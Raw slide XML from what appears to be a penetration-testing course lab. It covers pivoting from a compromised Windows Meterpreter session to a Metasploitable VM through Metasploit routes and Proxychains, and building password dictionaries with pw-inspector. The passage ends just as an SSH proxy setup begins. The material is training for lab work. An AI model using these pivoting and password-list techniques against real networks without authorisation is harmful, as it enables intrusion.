            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start metasploitable, set the IP to 10.10.0.20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure we can ping back and forth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We're going to look at how to route attacks from one machine to another using either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="980038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msf route</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="815042"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>We will route from our kali through the Windows session and now attack the metasploitable VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This is useful if we cannot reach a host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Maybe behind a firewall or part of an internal network </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>RFC1918 address, example: 192.168.0.0/16 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>We will route an attack through an exposed host to get to a host we cannot see</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>For this lab, we can route to Metasploitable, but that will not always be the case</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>After we attack, the internal protected machine will reverse connect back to us!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1463074" y="2836037"/>
            <a:ext cx="6127126" cy="2345822"/>
            <a:chOff x="1583594" y="2672411"/>
            <a:chExt cx="6127126" cy="2345822"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="42" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1583594" y="2672411"/>
              <a:ext cx="6066866" cy="2345822"/>
              <a:chOff x="2872279" y="1464178"/>
              <a:chExt cx="6066866" cy="2345822"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2872279" y="1464178"/>
                <a:ext cx="6066866" cy="2244723"/>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000"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="12" name="Graphic 11" descr="Lapto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9526" y="1623601"/>
                <a:ext cx="845184" cy="845184"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="13" name="Group 12"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2895289" y="2573875"/>
                <a:ext cx="1236125" cy="1236125"/>
                <a:chOff x="1060174" y="3500236"/>
                <a:chExt cx="1524000" cy="1524000"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="14" name="Graphic 13" descr="Lapto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0174" y="3500236"/>
                  <a:ext cx="1524000" cy="1524000"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="15" name="Picture 14" descr="&lt;strong&gt;Skull&lt;/strong&gt; and Crossbones"/>
                <p:cNvPicPr>
                  <a:picLocks noChangeAspect="1"/>
                </p:cNvPicPr>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId6">
                  <a:duotone>
                    <a:prstClr val="black"/>
                    <a:schemeClr val="accent2">
                      <a:tint val="45000"/>
                      <a:satMod val="400000"/>
                    </a:schemeClr>
                  </a:duotone>
                </a:blip>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1581002" y="3960181"/>
                  <a:ext cx="482344" cy="412604"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Graphic 20" descr="Lapto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12822" y="2769345"/>
                <a:ext cx="845184" cy="845184"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="TextBox 7"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="2402595">
                <a:off x="6263910" y="2249941"/>
                <a:ext cx="1911613" cy="416011"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>Attack</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="12" idx="3"/>
                <a:endCxn id="21" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6394710" y="2046193"/>
                <a:ext cx="1418112" cy="11457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rot="19156893">
                <a:off x="3742718" y="2292435"/>
                <a:ext cx="1911613" cy="416011"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>Meterpreter</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="28" name="Straight Arrow Connector 27"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="14" idx="3"/>
                <a:endCxn id="12" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="4131414" y="2046193"/>
                <a:ext cx="1418112" cy="1145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cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="4142906" y="3268134"/>
                <a:ext cx="3669916" cy="10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553861" y="2899251"/>
                <a:ext cx="2746252" cy="416011"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0"/>
                  <a:t>Meterpreter</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="TextBox 42"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4182978" y="2715672"/>
              <a:ext cx="1015021" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>Windows</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="TextBox 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6182738" y="4599776"/>
              <a:ext cx="1527982" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>Metasploitable</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8194" name="Picture 2" descr="Image result for windows 10 logo"/>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813" b="92188" l="6445" r="94336">
                          <a14:foregroundMark x1="17969" y1="28320" x2="17969" y2="28320"/>
                          <a14:foregroundMark x1="23242" y1="62695" x2="23242" y2="62695"/>
                          <a14:foregroundMark x1="74414" y1="62695" x2="74414" y2="62695"/>
                        </a14:backgroundRemoval>
                      </a14:imgEffect>
                    </a14:imgLayer>
                  </a14:imgProps>
                </a:ext>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4547962" y="3071865"/>
              <a:ext cx="267058" cy="2670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7033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Making a dictionary with pw-inspect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Answer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88384" y="869823"/>
            <a:ext cx="7248313" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Use pw-inspector to print passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>At least 6 characters long but no more than 10 characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Uses at least 2 of the following 3 categories: lowercase, uppercase, numbers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nmap.lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> | pw-inspector -m 6 -M 10 -l -u -n -c 2</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1200" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Create a new dictionary file called lab9.lst with the following rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Between 8-10 characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Must use upper and lower case characters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>nmap.lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>pw-inspector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> -m 8 -M 10 -l -u | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> tee lab9.lst</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1200" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFAAD084-22C4-2F47-A118-4AF509893F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6232982" y="823279"/>
            <a:ext cx="2703070" cy="2744234"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C0F51FB-F6B1-FA4A-9AE9-768930537BBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="598821" y="3347045"/>
            <a:ext cx="5542013" cy="1552928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353921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EE52B2-37ED-48E3-91AD-72006C6F857A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Routing with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{798EDE5A-30E5-450D-9507-8CA08BFF7542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> can be used to send any traffic over a proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>TOR, SOCKS4/SOCKS5, or HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>https://github.com/haad/proxychains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Call any command to route traffic over your proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> 10.10.0.20 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> -F</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> cannot send non-standard packets (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Use with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>, since this is the full TCP connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Don’t use proxychains4, use proxychains3 (comes with Kali 2021)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.techorganic.com/2012/10/10/introduction-to-pivoting-part-2-proxychains/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.elearnsecurity.com/nessus-and-metasploit-scan-networks-in-pivoting.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2543548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1C7200-30C7-4996-B1A7-D642578ED21A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setting up a local proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58924B5D-3344-4378-8A4E-9753DC00C0B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Use SSH to create your proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
